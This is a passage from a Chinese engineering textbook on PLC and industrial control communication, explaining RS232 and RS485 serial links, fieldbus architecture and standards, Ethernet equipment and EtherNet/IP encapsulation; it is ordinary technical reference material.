PLC与工控系统总线通信 3.4.1 PLC通信方式 串行口通信 ,如采用 RS232C标准 ,一般用于现场 PLC与人机界面通信或者与编程器 通信如笔记本电脑通信 ,特点是点对点的近距离连接 。现场总线应用在工业和工程现场 , 采用网段连接在传感器 、仪表 、PLC和监控计算机系统之间进行通信 。 3.4.2 PLC串行通信 3.4.2.1 RS232串行通信 RS232串行通信应用历史时间虽然较长, 但在很多工业应用场合已被 RS485通信替代 。 RS232串行通信仍然是最常用的人机交互和现场数据传递的重要方式 。例如 ,RS232串行通 图 3-54 RS232串口针脚 RI、GND。 表 3-8 信被用于与工程师便携式计算机通信, 与手持编程器 通信, 与显示器 、LCD人机界面和触摸屏通信, 与重 要的外部设备通信(打印机 、扫描仪等)。 (1) RS232串口针脚定义 。 1) 9针 接 口 针 脚 定 义 。 RS232 串 口 针 脚 如 图 3-54所示 , 9针接口针脚定义见表 3-8。 信号简称: TXD、 RXD、 RTS、 CTS、 DTR、 DSR、 DCD、 9针接口针脚定义 9芯 信号方向来自 缩写 描 述 1 调制解调器 CD 载波检测 2 调制解调器 RXD 接收数据 3 PC TXD 发送数据 4 PC DTR 数据终端准备好 5 GND 信号地 6 调制解调器 DSR 通信设备准备好 7 PC RTS 请求发送 8 调制解调器 CTS 允许发送 9 调制解调器 RI 响铃指示器 注 调制解调器在这里是一个例子 ,它可以是其他的 RS232终端设备 。 2) RS232串口9针 ~25针针脚功能 。RS232串口信号引脚功能见表3-9。 表 3-9 RS232串口信号引脚功能 D-Sub9 功 能 D-Sub25 功 能 2 接收数据 2 传送数据 3 传送数据 3 接收数据 4 数据终端准备 6+8 数据设置准备 +运送检测 5 系统地 7 系统地 6+1 数据设置准备 +运送检测 20 数据终端准备 7 请求发送 5 清除发送 8 清除发送 4 请求发送 (2) RS232串口通信 。 串口通信的概念非常简单 , 串口按位 (bit) 发送和接收字节 , 尽管比按字节 (Byte) 的并行通信慢 ,但是串口可以在使用一根线发送数据的同时用另一根线接收数据 。它的工作 原理很简单并且能够实现远距离通信 。 比如IEEE488定义并行通行状态时 , 规定设备线总 常不得超过20m ,并且任意两个设备间的长度不得超过 2m; 而对于串口而言 , 长度可达 1200m 。 串口用于 ASCII码字符的传输 。通信使用 3根线完成: 1— 地线; 2— 发送; 3— 接 收 。 由于串口通信是异步的 ,端口能够在一根线上发送数据同时在另一根线上接收数据 。其 他线用于握手 ,但是不是必须的 。 串口通信最重要的参数是波特率 、数据位 、停止位和奇偶 校验 。对于两个进行通行的端口 ,这些参数必须匹配 。 1) 波特率 。这是一个衡量通信速度的参数 , 表示每秒钟传送的 bit的个数 。 例如 300 波特率表示300bit/s 。 当提到时钟周期时 ,就是指波特率 ,例如如果协议需要 4800波特率, 那么时钟是4800Hz, 这意味着串口通信在数据线上的采样率为4800Hz。 通常电话线的波特 率为14400、28800和36600,波特率可以远远大于这些值 ,但是波特率和距离成反比 。 2) 数据位 。这是衡量通信中实际数据位的参数 。 当计算机发送一个信息包 , 实际的数 据不会是8位的 ,标准的值是5、7和8位 。 如何设置取决于你想传送的信息 。 比如 , 标准 的 ASCII码是0~127(7位)。 扩展的 ASCII码是 0~255(8位)。 如果数据使用简单的文 本(标准 ASCII码), 那么每个数据包使用 7位数据 。 每个包是指一个字节 , 包括开始/停 止位 ,数据位和奇偶校验位 。 由于实际数据位取决于通信协议的选取 ,术语“ 包 ” 指任何通 信的情况 。 3) 停止位 。用于表示单个包的最后一位 。典型的值为1、1.5和2位 。 由于数据是在传 输线上定时的 ,并且每一个设备有其自己的时钟 ,很可能在通信中两台设备间出现了小小的 不同步 。 因此停止位不仅仅是表示传输的结束 ,并且提供计算机校正时钟同步的机会 。适用 于停止位的位数越多 ,不同时钟同步的容忍程度越大 ,但是数据传输率同时也越慢 。 4) 奇偶校验位 。 串口通信中有四种检错方式: 偶 、奇 、高和低 。 当然没有校验位也是 可以的 。对于偶和奇校验的情况 , 串口会设置校验位 (数据位后面的一位), 用一个值确保 传输的数据有偶个或者奇个逻辑高位 。例如 ,如果数据是 011,那么对于偶校验 , 校验位为 0,保证逻辑高的位数是偶数个 。如果是奇校验 , 校验位位 1, 这样就有 3个逻辑高位 。 高 位和低位不真正地检查数据 , 简单置位逻辑高或者逻辑低校验 。这样使得接收设备能够知道 一个位的状态 ,有机会判断是否有噪声干扰了通信或者是否传输和接收数据是否不同步 。 3.4.2.2 RS485串行通信 (1) RS485原理 。 RS485采用差分信号负逻辑 , +2~+6V表示“ 0”, —6~— 2V表示“ 1”。 RS485有 两线制和四线制两种接线 , 四线制只能实现点对点的通信方式 ,现已很少采用 ,现在多采用 的是两线制接线方式 ,这种接线方式为总线式拓扑结构在同一总线上最多可以挂接 32个结 点 。在 RS485通信网络中一般采用的是主从通信方式 , 即一个主机带多个从机 。很多情况 下 ,连接 RS485通信链路时只是简单地用一对双绞线将各个接口的“ A”“B”端连接起来 。 而忽略了信号地的连接 , 这种连接方法在许多场合是能正常工作的 ,但却埋下了很大的隐 患 ,这有两个原因: 1) 共模干扰问题 。RS485接口采用差分方式传输信号方式 , 并不需要相对于某个参照点来检测信号 , 系统只需检测两线之间的电位差就可以了 。但人们往往忽视了收发器有一定 的共模电压范围 ,RS485收发器共模电压范围为—7~+12V, 只有满足上述条件 , 整个网 络才能正常工作 。 当网络线路中 共模电压超出此范围时就会影响通信的稳定可靠 , 甚至损 坏接口 。 2) EMI问题 。发送驱动器输出信号中的共模部分需要一个返回通路 , 如没有一个低阻 的返回通道(信号地), 就会以辐射的形式返回源端 , 整个总线就会像一个巨大的天线向外 辐射电磁波 。 由于 PC机默认的只带有 RS232接口 ,有两种方法可以得到 PC上位机的 RS485信号 。 通过 RS232/RS485转换电路将 PC机串口 RS232信号转换成 RS485信号 。对于情况比较复 杂的工业环境 ,最好是选用防浪涌 、带隔离栅的产品 。 通过 PCI多串口卡 , 可以直接选用 输出信号为 RS485类型的扩展卡 。 (2) RS485电缆 。 在一般场合采用普通的双绞线就可以 ,在要求比较高的环境下可以采用带屏蔽层的同轴 电缆 。在使用 RS485接口时 ,对于特定的传输线路 , 从 RS485接口到负载其数据信号传输 所允许的最大电缆长度与信号传输的波特率成反比 ,这个长度数据主要是受信号失真及噪声 等影响所影响 。理论上 RS485的最长传输距离能达到 1200m , 但在实际应用中传输的距离 要比1200m短 ,具体能传输多远视周围环境而定 。在传输过程中可以采用增加中继的方法 对信号进行放大 ,最多可以加八个中继 , 也就是说理论上 RS485的最大传输距离可以达到 9.6km 。如果真需要长距离传输 ,可以采用光纤为传播介质 , 收发两端各加一个光电转换 器 , 多模光纤的传输距离是5~10km , 而采用单模光纤可达50km的传播距离 。 (3) RS485布网 。 网络拓扑一般采用终端匹配的总线型结构 ,不支持环形或星形网络 。在构建网络时 , 应 注意如下几点: 1) 采用一条双绞线电缆做总线 ,将各个节点串接起来 , 从总线到每个节点的引出线长 度应尽量短 , 以便使引出线中的反射信号对总线信号的影响最低 。有些网络连接尽管不正 确 ,在短距离 、低速率传输时仍可能正常工作 , 但随着通信距离的延长或通信速率的提高, 其不良影响会越来越严重 , 主要原因是信号在各支路末端反射后与原信号叠加 ,会造成信号 质量下降 。 2) 应注意总线特性阻抗的连续性 ,在阻抗不连续点就会发生信号的反射 。 下列几种情 况易产生这种不连续性: 总线的不同区段采用了不同电缆 ,或某一段总线上有过多收发器紧 靠在一起安装 ,再者是过长的分支线引出到总线 。总之 ,应该提供一条单一和连续的信号通 道作为总线 。 在 RS485组网的过程中另一个需要注意的问题是终端负载电阻问题 , 在设备少 、距离 短的情况下不加终端负载电阻 ,整个网络能很好的工作 , 但随着距离的增加 , 性能将降低 。 理论上 ,在每个接收数据信号的中点进行采样时 , 只要反射信号在开始采样时衰减到足够低 就可以不考虑匹配 。但这在实际上难以掌握 , 美国 MAXIM 公司提出一个经验性的原则, 可以用来判断在什么样的数据速率和电缆长度时需要进行匹配: 当信号的转换时间(上升或 下降时间) 超过电信号沿总线单向传输所需时间的3倍以上时就可以不加匹配 。 一般终端匹配采用终端电阻方法 ,RS485应在总线电缆的开始和末端都并接终端电阻 。 终接电阻在 RS485网络中取120Ω。相当于电缆特性阻抗的电阻 , 因为大多数双绞线电缆特 性阻抗大约在100~120Ω。这种匹配方法简单有效 ,但有一个缺点 , 匹配电阻要消耗较大功 率 ,对于功耗限制比较严格的系统不太适合 。另外一种比较省电的匹配方式是 RC匹配 , 利 用一只电容隔断直流成分可以节省大部分功率 。但电容的取值是个难点 ,需要在功耗和匹配 质量间进行折中 。还有一种采用二极管的匹配方法 ,这种方案虽未实现真正的匹配 ,但它利 用二极管钳位作用能迅速削弱反射信号 ,达到改善信号质量的目的 ,节能效果显著 。 3.4.3 总线通信 3.4.3.1 现场总线通信 现场总线是应用在工业和工程现场 ,在嵌入式测量仪表与控制设备之间实现双向串行多 节点数字通信的网络系统 。现场总线系统是具有开放连接和多点数字传输能力的底层控制网 络 , 近几年来 , 它迅速在制造工业 、流程工业 、交通工程 、建筑工程和民用与环境工程等方 面的自动化系统中实现了成功应用 ,并向更广阔的应用范围发展 。 现场总线技术把微控器和通信控制器嵌入到传统的测量控制仪表 ,这些仪表传感器可在 本地进行传感器信号处理 , 而执行器 , 如调节阀有了数字 PID的计算和数字通信能力 , 采 用双绞线作为串行数据通信总线 , 把每个测量控制仪表 、执行器 、PLC和上级计算机连接 成的网络系统 ,构成了全分布式的网络控制系统 。按现场总线通信协议 ,位于工业或工程现 场的每个嵌入式传感器 、测量仪表 、控制设备 、专用数据存储设备和远程监控计算机都通过 一条现场总线在任意单元之间进行数据传输与信息交换 ,按实际应用需要实现不同地点不同 回路的自动控制系统 。现场总线把单个分散的测量控制设备变成网络节点 , 由一条总线连接 成可以相互交换信息 ,共同完成控制 、优化和管理任务的控管一体化系统 。它给工业和工程 自动化领域带来的变化 ,如同众多分散的计算机被以太网连接在一起 ,使计算机的功能和作 用发生了巨大的变化 。现场总线使自动控制系统的结构大大简化 ,分散化的设备都具有通信 能力和控制信息处理能力 ,提高了控制系统的安全可靠性和整体性能水平 。 (1) 现场总线系统的结构特点 。 现场总线系统打破了传统控制系统的结构形式 。传统模拟控制系统采用一对一的设备连 线 ,按控制回路分别进行点对点连接 。位于现场的测量变送器与位于控制室的控制器之间, 控制器与位于现场的执行器 、开关 、 电动机之间均存在不同的一对一连线 。 现场总线系统由于采用了智能现场设备 , 能够把原先 DCS系统中处于控制室的控制模 块 、各输入输出模块置入现场设备 ,加上现场设备具有通信能力 ,现场的测量变送仪表可以 与阀门等执行机构直接传送信号 , 因而控制系统功能能够不依赖控制室的计算机或控制仪 表 ,直接在现场完成 ,实现了彻底的分散控制 。 图3-55为现场总线控制系统与传统控制系 统的结构对比 。 由于采用数字信号替代模拟信号 , 因而可实现一对电线上传输多个信号(包 括多个运行参数值 、多个设备状态 、故障信息), 同时又为多个设备提供电源; 现场设备不 再需要模/数 、数/模转换部件 。这样就为简化系统结构 ,节约硬件设备 ,节约连接电缆与各 种安装 、维护费用创造了条件 。 (2) 现场总线系统的技术特点 。 1) 系统体系的开放性 。开放主要是相关标准和规范的公开 。任何设备制造企业和公司, 现场总线设备的用户都可以方便地得到现场总线有关标准协议文本 。 因此 ,所有企业生产的 现场总线设备 ,一旦标有相应现场总线的标志 (如 FF), 就意味着对公开协议的一致遵从 。 图 3-55 现场总线控制系统与传统控制系统结构的对比 (a) 传统控制系统结构;(b) 现场总线控制系统 一个开放系统是说明它可以在任何地方与遵守相同标准的其他设备或系统连接应用 。通信协 议一致公开 ,各不同企业的设备之间可实现信息交换 。现场总线开发者是要致力于建立统 一 的工厂底层网络的开放系统 ,用户可按自己的需要和考虑 ,把来自不同供应商的产品组成大 小随意的系统 ,通过现场总线构筑自动化领域的开放互连系统 。 2) 互可操作性与互用性 。互可操作性是指实现互连设备和系统间的信息传送与交换, 而互用则意味着不同生产企业的性能类似的设备可实现相互替换 。 由于现场设备的智能化和 功能自治 , 它将传感测量 、补偿计算 、工程量处理与控制等功能分散到现场设备中完成 。 因 此 ,现场设备可以完成自动控制的基本功能 ,并可随时将诊断设备运行状态的信息进行交 换 。这样就保证子系统的互可操作性和互用性 。 3) 系统结构的高度分散性 。现场总线构成了一种新型的全分散性控制系统的体系结构 。 与现有的集散控制系统 DCS集中与分散相结合的系统体系相比 , 简化子系统结构并提高了可靠性 。 由于现场总线设置在生产过程现场 , 企业网络底层的现场总线专为现场环境而设 计 ,支持双绞线 、 同轴电缆 、光缆 、射频 、红外线 、 电力线等不同传输介质 ,具有较强的抗 干扰能力 , 能采用两线制实现供电及通信 ,并可满足本质安全防爆要求 。这种对现场环境的适应性支持了高度分散的系统结构 。 图 3-56 IEC/ISA 现场 总线参考模型 3.4.3.2 总线通信协议 (1) 现场总线通信协议模型 。 IEC/ISA(ISA,美国仪表学会) 在综合了多种 现场总线标准的基础上制订了现场总线协议模型 , 规定了现场应用过程之间的可互操作性 、通信方式 、 层次化的通信服务功能划分 、信息的流向及传递规 划 ,并将上述内容以类似于 ISO/OSI参考模型的方 式进行了定义 。 IEC/ISA现场总线参考模型如图3-56所示 。 比 较可见 , 现场总线的体系结构省略了网络层 、传输 层 、会话层及表示层 。 这主要是针对工业过程的特 点 ,使数据在网络流动中尽量减少中间环节 , 加快数据的传递速度 ,提高网络通信数据处理的实时性 。 目前大多数现场总线参考模型采用了这种模型 ,但有的在应用层上又加了用户层 (如 FF现场总线)。 有个别现场总线协议也包括全部7层协议 ,如 LonWorks现场总线协议 。从 发展趋势上看 ,现场总线模型仍保持多样性和融合性 ,例如工业以太网的发展就是传统计算 机网络与现场总线网络融合的结果 。 (2) 协议内容 。 1) 物理层协议 。该层建立在通信介质连接的两个物理设备之上 , 为链路层提供透明位 流传输所必须遵循的规则 , 有时也被称为物理接口 。 接口两边的设备 , 在ISO术语中被叫 做 DTE(数据终端设备) 和 DCE(数据通信设备), 物理层协议主要提供给 DTE和 DCE之 间的接口 。 物理层要在 DTE与 DCE之间完成物理连接和传送通路的建立 、维持和释放等操作 , 它 为在物理上连接的两个数据链路实体之间提供透明的位流传送 。物理连接可能是永久性的, 也可动态连接和释放 。物理连接允许进行全双工或半双工的位流传送 。在传送过程中 , 它能 对传送通路的工作情况进行监督 ,一旦出现故障 ,立即通知 DTE和 DCE。物理层有四个重 要特性: .物理层的机械特性规定了物理连接时所使用的可接插连接器的形状尺寸 、连接器中引 脚的数量与排列情况等 。 .物理层的电气特性规定了在物理连接器上传输二进制比特流时线路上信号电平的高 低 、阻抗及阻抗匹配 、传输速率与距离限制 。早期的标准定义了物理连接边界点上的电气特 性 ,而较新的标准定义了发送器和接收器的电气特性 , 同时给出互连电缆的有关规定 。新的 标准更利于发送和接收电路的集成化工作 。 .物理层的功能特性规定了物理接口上各条信号线的功能分配和确切定义 。物理接口信 号线一般分为: 数据线 、控制线 、定时线和地线等几类 。 .物理层的规程特性定义了利用信号线进行二进制比特流传输的一组操作过程 ,包括各 信号线的工作规则和时序 。 不同物理接口标准在以上四个重要特性上都不尽相同 。实际应用中使用比较广泛的物理 接口标准是 EIA232-D。EIA232-D是美国电子工业协会 (EIA, Electronic Industry Asso- ciation) 制定的物理接口标准 ,也是目前数据通信与网络中应用最广泛的一种标准 。 它的前 身是 EIA在1969年制定的 RS232-C标准 。RS(Recommended Standard) 为推荐标准词头 的缩写 ,232是标准号 。RS232-C是 RS232标准的第三版 。RS232-C是一种应用十分广泛的 物理接口标准 。经1987年 1月修改后 ,定名为 EIA232-D。 由于两者相差不大 , 因此 EIA 232-D与 EIA RS232-C在 物 理 接 口 标 准 中 基 本 成 为 等 同 的 标 准 , 人 们 经 常 简 称 它 们 为 “ RS232标准”。 另外还有工业通用物理接口 EIA485、IEC1158-2等 。EIA232采用25针 D 型插件 。EIA485采用9针 D型插件 ,仅3针有效 ,包括一对数据线和一个屏蔽地 。 2) 数据链路层协议 。数据链路层负责将数据封装和向物理层发送数据 , 为 OSI模型的 第二层 ,接收来自物理层的数据帧 。该层协议处理两个有物理通道直接连接的相邻站间通 信 。数据链路层协议的目的在于提高数据传输的效率 , 为其上层提供透明的无差错的通道服 务 ,把传输媒体的不可靠因素尽可能地屏蔽起来 ,让高层协议免于考虑物理介质的可靠性问 题 , 而把通道看作无差错的理想通道 。 IEEE802委员会为局域网定义了介质访问控制 ( MAC) 层 、 逻辑链路控制 (LLC) 层 。介质访问控制层与逻辑链路控制层是属于 OSI参考模型中数据链路层的两个子层 。 一 个报文(message) 是由若干个字符组成的完整的信息 ,直接对冗长的报文进行检错和纠错, 不但原理和设备十分复杂 , 而且效率很低 ,往往无法实际采用 。为此 ,通常把报文按一定要 求分块 , 每个代码块加上一定的头部信息 ,指明该代码的源和目的地址 ,属于哪个报文 , 是 该报文的第几块代码 ,是否属于报文的最初或最后一块代码等 ,这样的代码块称为包或分组 (packet)。 在相邻两点间(或主机与节点间) 传输这些包时 , 为了差错控制 , 还要加上一层 “ 封皮”, 就构成了帧(frame)。 这层封皮分头尾两部分 ,把包夹在中间 。 当帧从一个节点传 到另一个节点后 , 帧的头尾被用过后取消 ,包的内容原封不动 。若收到帧的节点还要把该包 传至下一节点 ,另加上新的头尾信息 。 因此 , 帧是数据链路层的传输单位 ,数据链路层协议 又称为帧传送协议 。 数据链路是在两个网络节点之间保证数据正常交换的通路 , 主要功能是保证相邻节点的 正确传输 。相邻节点间传输一个帧可能出现的差错有: 位出错 、 帧丢失 、 帧重复 、 帧顺序 错 。链路层协议要针对这些情况加以解决 ,保证所传送信息在内容上 、顺序上都正确 。位出 错的分布规律及出错位的数量很难限制在预定的简单模式之中 ,一般采用漏检率极其微小的 CRC检错码再加上反馈重传的方法解决 。 帧丢失是通信线路受较长时间的连续干扰 , 通信 设施的瞬间失效或通信双方失去同步造成的; 而帧重复和帧顺序错则是反馈重传方法带来的 副作用 。为了发现帧丢失 、 帧重复及帧顺序错等错误 , 通常采用给帧进行编号的方法来 解决 。 数据链路层的主要功能如下 。 .数据链路的建立和拆除: 包括同步 、站址确认 、收发关系的确定 、最终一次传输的表 示等 。 .信息传输: 包括信息格式 、数量 、顺序编号 、接收认可 、信息流量调节方案等 。 .传输差错控制 ,包括一套防止信息丢失 、重复和失序的方法 。 .异常情况处理: 包括如何发现可能出现的异常情况及发现后的处理过程 。协议中对异 常情况的处理主要用于发现和恢复永久性故障 。 发送方数据链路层的具体工作是接受来自高层的数据 ,并将它加工成帧 ,然后经物理通 道将帧发送给接收方 。 帧包含头 、尾 、控制信息 、数据 、校验和等部分 ,校验和 、头 、尾部 分一般由发送设备的硬件实现 ,数据链路层不必考虑其实现方法 。 当帧到达接收站时 , 首先 检查校验和 ;若校验和错 ,则向接收计算机发出校验和错的中断信息 ;若校和正确 ,确认无 传输错误 ,则向接收计算机发帧正确到达信息 , 接受方的数据链路层应检查帧中的控制信 息 ,确认无误后才将数据部分送往高层 。 3) 应用层 。应用层是 OSI模型的最高层 ,实现的功能分为两大部分 , 即用户应用进程 和系统应用管理进程 。 系统应用管理进程管理系统资源 ,如优化分配系统资源和控制资源的 使用等 。 由管理进程向系统各层发出下列要求: 请求诊断 ,提交运行报告 , 收集统计资料和 修改控制等 。 除此之外 , 系统应用管理进程还负责系统的重启动 ,包括从头启动和由指定点 重启动 。用户应用进程由用户要求决定 。通常的应用有数据库访问 、分布计算和分布处理 等 。通用的应用程序有如电子邮件 、事务处理 、文件传输协议和作业操作协议等 。 4) 用户层 。现场总线用户层是在现场总线开发商开发集散控制系统 DCS过程中积累起来的软件功能块和协议 ,包括现场总线功能块应用集合和用户层协议 。功能块应用进程是用 户层的重要组成部分 。功能块应用进程提供一个通用结构 ,把实现控制系统所需的各种功能 划分为不同功能模块 ,使其公共特征标准化 ,规定它们各自的输入 、输出 、算法 、事件 、参 数与块控制机制 ,通过功能块调度来完成自动化系统控制功能 。 用户层中的功能块应用是通过虚拟设备 (VFD) 来组织的 。VFD是定义了物理设备中 可被远程通信伙伴所见的数据描述和行为规范的模型 ,是设备中网络可视对象和其行为的体 现 。在功能块开发过程中 , 可根据需要将所有的功能块应用划分到一个或多个 VFD中去 。 一个物理设备中至少有两个 VFD,其中一个是协议栈的管理 VFD。功能块应用集合的基本 元素是对象 ,对象是共享相同数据结构 、具有共同行为的数据定义 。 (3) 现场总线国际标准 。 IEC61158(IEC/TC65/SC65C) 的10种类型: IEC技术报告 (相当于 FF的低速部分 H1, 由美国 Rosemount等公司支持)。 .ControlNet由美国 Rockwell等公司支持; . Profibus由德国 Siemens等公司支持; .P-Net由丹麦 Process Data等公司支持; . FF的 HSE,(High Speed Ethernet) 由美国 Emerson等公司支持; .Swift net由美国波音等公司支持; .World FIP法国 Alstom等公司支持; .Interbus由德国 Phoenix Contact等公司支持; . FF的应用层(Application Layer); . Profinet德国 Siemens等公司支持 。 可以看出 , IEC61158实际上包括了 FF、 Control Net、 Profibus、 P-net 、 Swift Net、 World FIP、Interbus与 Profinet共8种现场总线 。 IEC62026(IEC/TP17/SC17B) 包括了4种现场总线国际标准: .ASi(Actuator Sensor-interface) 执行器传感器接口 , 由德国 Festo与 Btf等公司支持; .DeviceNet由美国 Rockwell等公司支持; . SDS(Smart Distributed System)灵巧式分散型系统 , 由美国 Honeywell等公司支持; . Seripex(串联多路控制总线)。 ISO11898与 ISO11519包括 CAN(Control Aero Network控制器局域网络 , 由德国 Bosch等公司支持)、 CAN11898(1Mbit/s)、 CAN11519(125kbit/s)。 另外还有美国标准现场总线 LonWorks, Emerson公司的 WirelessHRART。 因此 , 目 前现场总线的国际标准至少有 15种 , 而且还有可能增加 。 在国内应用较多的是西门子的 Profibus、 Rockwell的 DeviceNet、 FF基金会现场总线和 CAN总线标准 , 各种协议均通过 专用板卡或模块实现计算机和 PLC的总线网络通信 。 3.4.4 网络通信 3.4.4.1 以太网通信 以太网(Ethernet) 是一种计算机 LAN, 是由若干个站点 (网络节点) 和将其连接到 网上所使用的设备以及站点间传输信息的介质组成的 。各站点间的通信通过符合上述标准规 范的以太网 , 以传输介质接入控制 MAC(Media Access Control) 的方法实现的 。其传输介质也需遵守相关标准规定的以太网物理层的性能规范 , 信息在各种设备与传输介质中的运 行 ,如图3-57所示 。 图 3-57 一个由以太网组成的网络通信实例 BD— Broadcast Domain广播域; CD— Collision Domain碰撞域 以太网逻辑链路层(LLC) 结构如图3-58所示 。 图 3-58 逻辑链路层(LLC) 结构 以下就以太网中传输信号的形式 、通信工作模式 、 主要设备 、传输介质及 Ethernet介 质接入控制规范等做简要的说明 。 (1) 传输信号形式 。 以太网中传输的信号是以帧的形式存在的, 是 Ethernet通信信号的基本单元 。在 Eth- ernet 中不允许非帧形式的信号存在 ,一旦发现有非帧形式的信号就会将其丢弃 。 (2) 通信工作模式 。 一般地说, 通信网络有半双工和全双工两种模式 。半双工工作模式是站点发送与接收信号使用同一个物理通道 ,各个站点不能同时发送信急 , 因此一般在使用 CSMA/CD介质接 入规则的以太网站点之间采用半双工工作模式 。对于全双工工作模式 ,是站点之间发送与接 收信息分别有独立的物理通道 , 因而允许两个站点之间同时向对方发送信息 。 (3) 以太网的主要设备 。 以太网中的设备主要包括网卡(Network Interface Card)、 中继器(Repeater or Hub)、 网桥(Bridge)、 交换机(FrameSwitcher)、 路由器(Router) 及服务器(Server) 等 。 1) 网卡 NIC。NIC是网络接口控制器的简称 , 也称网络接口适配器 (Network Inter- face Adapter Card)。 其主要的功能是将各站点连到 Ethernet的介质上 , 是计算机和工作站 间的网络接口 。 各站点无网卡就无法上网 , 因此是将计算机网络站点连接到网上必备的 设备 。 2) 中继器(Repeater or Hub)。 中继器是 Ethernet的核心 , 所有站点都必须连接到中 继器内部总线的各端口上 。 中继器和其连接的网络节点通常称为一个网段 。 3) 网桥(Ethernet Bridge)。 网桥是可以连接若干个网段(碰撞域) 的多端口设备 。 当 一个网段上站点太多时 ,会发生过多的竞争与碰撞 , 造成通信的中断或使网络利用率下降 。 为了克服这种缺点 ,可将此网段分割成若干个小网段并利用网桥将其连接起来 , 进行过滤 (Filtering)、 转发(Forwarding) 等 , 以达到减少竞争与碰撞的目的 。 网桥连接成的网络被 称为一个广播域(Broadcast Domain), 它是若干个网段(碰撞域) 上各站点的集合 。 4) 交换机(FrameSwitcher)。 交换机的功能与网桥相类似 , 不同的地方是 , 通常交换 机可以使用专用的集成电路 (ASIC, Application-Specific Integrated Circuit) 或多个 CPU, 可以并行收发多个帧信息 , 而且所有的端口都可以同时收发信息 。 5) 路由器(Router)。 路由器是用于将多种不同类型 LAN连接在一起的设备 。 由路由 器将多种不同类型的 LAN连接在一起可以形成干线网络 , 覆盖整个城市或国家 。 例如In- ternet 便是覆盖世界范围的巨大的路由器网络 。 6) 网关(Gateway)。 网关在传输层以上实现网络互联 ,用于不同高层协议的网络之间 的信息变换 。 (4) 传输介质 。 以太网采用的传输介质分为电缆和光缆两类 。其中电缆包括同轴电缆与双绞线对等 , 而 光缆则包括多模光缆和单模光缆 ,如4对100Ω5类 UTP电缆 。 (5) 介质变换器(Media Converter)。 介质变换器(Media Converter) 用于以太网传输介质的变换 , 这里主要是电缆与光缆 之间的变换 。将传输介质由电缆转换为光缆 ,不但可以扩大网径 ,增大传输距离 , 而且可以 简单地实现信息从“ 干线直接到桌面”。 此外 , 还用于以太网和传输干线网络之间的接口设 备和网管设备之中 。 3.4.4.2 工业以太网通信 德国西门子(Siemens) 公司的 Profinet和美国罗克韦尔(Rockwell) 公司的 EtherNet/ IP是典型的工业以太网 。 由于工业自动化系统正向分布式 、智能化的实时控制方向发展 ,用户要求企业从现场控 制层到管理层能实现全向的无缝信息集成 ,并提供一个开放的基础构架 ,这都要求控制网络 使用开放的 、透明的通信协议 。 近年国际工业控制领域的共同趋势是使用基于IEEE802.3和 TCP/IP的网络技术 ,形成新型的基于以太网的网络控制技术 , 即工业以太网 。 目前国际 上比较流行的工业以太网有以下几种: 1) 现场总线基金会开发的 HSE高速以太网 , 它提供了发布方/定购方 、对象等模型, 主要用于工程控制领域 , 得到了 Fisher/Rosemount、 Foxboro及 Honeywell等国际著名公 司的支持 。 2) 得到西门子公司支持的 , 由 Profibus International组织推广的 Profinet, 它可实现在 各种不同场合的应用 , 完成各种不同需求的控制任务 。从应用角度上 , Profinet分为 CBA 和I/O两种 。 3) 由罗克韦尔 、欧姆龙等公司支持 , ODVA、ControlNet International组织的 Ether- Net/IP工业以太网 ,其中IP是指工业协议 , 它基于标准的 TCP/IP协议 。 除此之外 , 由施耐德公司发布的 Modbus/TCP协议 ,将 Modbus协议捆绑在 TCP协议 上 , 易于实施 ,便于网络互联 。 特别值得一提的是 , 通用工业协议 (CIP, Common Indus- trial Protocol) 为开放的现场总线 DeviceNet、 ControlNet、 Componet 、EtherNet/IP等网络 提供了公共的应用层和设备描述 。它建立在单一的 、与介质无关的平台上 , 为从工业现场到 企业管理层提供无缝通信 ,使用户可以整合跨越不同网络的有关安全 、控制 、 同步 、运动 、 报文和组态等方面的信息 。有助于使工程和现场安装的开销最小化 ,使用户获得最大的投资 收益 。作为设备间进行自动化数据传输的通信协议 ,CIP把每一个网络设备看作一系列对象 的集合 , 每个对象也只是一组设备相关数据的集合 ,称为属性 , 它通过设备描述对网络中的 设备进行完整的定义 。CIP采用高效灵活的数据交换模式 ——— 生产者/消费者模式 。 生产者 是数据的发送者 , 向网络上发送数据包 ,数据包携有指示数据内容的“ 唯一的 ”标识符 。 而 消费者是数据接收者 , 任何感兴趣的消费者都可通过标识符滤波 ,从网络中获取需要的数 据 ,这样多个消费者可以接收和使用这些数据 。CIP报文主要分为隐式报文和显式报文 , 隐 式报文主要传输一些实时I/O数据 、功能性安全数据和运动控制数据 , 显式报文主要是传 输一些配置 、诊断等数据 。下面以 EtherNet/IP为例介绍工业以太网的通信原理 。 (1) EtherNet/IP技术 。 EtherNet/IP技术是 CIP技术与以太网技术的巧妙结合 , 它基于 TCP/IP协议 , 只是在 TCP或 UDP报文的数据部分嵌入了 CIP封装协议 ,封装协议的主要任务是定义和规范了如 何封装和传输上层协议报文 , 以及如何管理和利用下层 TCP/IP连接 , 起到承上启下的 作用 。 EtherNet/IP规范对如何进行命令封装作出了详细规定 , 它将对 TCP、 UDP的管理 , 节点间通信连接的管理及数据交换封装在统一的封装结构中 。 EtherNet/IP的报文结构是 多层协议的级 联 , 首 先 是 以 太 网 首 部 , 共 14字 节 ; 其 次 是 IP首 部 , 20字 节 ; 然 后 是 TCP首部 , 也是20字节 。 整个数据封装格式如图3-59所示 , 而 EtherNet/IP的封装结构EtherNet/IP基 于 标 准 的 以 太 网 技 术 , 利 用 UDP协议传送隐式报文 , 将 UDP报文映射到多 播传送 ,实现高效I/O交换 , 并利用 TCP的流量 控制 点 对 点 特 性 通 过 TCP 通 道 传 输 CIP 显 式 报文 。 表 3-10 EtherNet/IP封装结构 结构 名称 数据类型 域 值 封装报头 命令 UNT 封装命令 长度 UNT 报文的数据部分字节为单位的长度 , 即报头后的字节数 会话句柄 阵列 会话标识 状态 UDNT 状态代码 发送者语义 UDNT 仅与封装命令发送者有关的信息 可选项 UDNT 选项标记 命令特定数据 封装数据 0~65511阵列 报文的这部分仅是某些命令的要求 (2) EtherNet/IP产品 。 EtherNet/IP的产品主要分为4类 。 1) 报文服务器 。报文服务器只采用显式报文通信方式 , 显式报文可基于连接或不基于 连接 ,在网络中 ,报文服务器只作为目标设备进行通信 ,一般用于数据的上传 、下载 , 数据 的采集 ,状态监控等场合 。 2) I/O服务器 [也称作适配器(Adapter)]。 适配器在第 1) 类的基础上增加了I/O报 文传输的功能 。 同样 ,在网络中 , 适配器也只能作为目标设备进行通信 。 一般用于简单的 I/O设备 ,气动阀 、交流驱动设备等 。 3) 报文客户机 。报文客户机在第 1) 类的基础上增加了客户机功能 , 可作为报文的发 起者发送显式报文; 用于 PC机接口卡 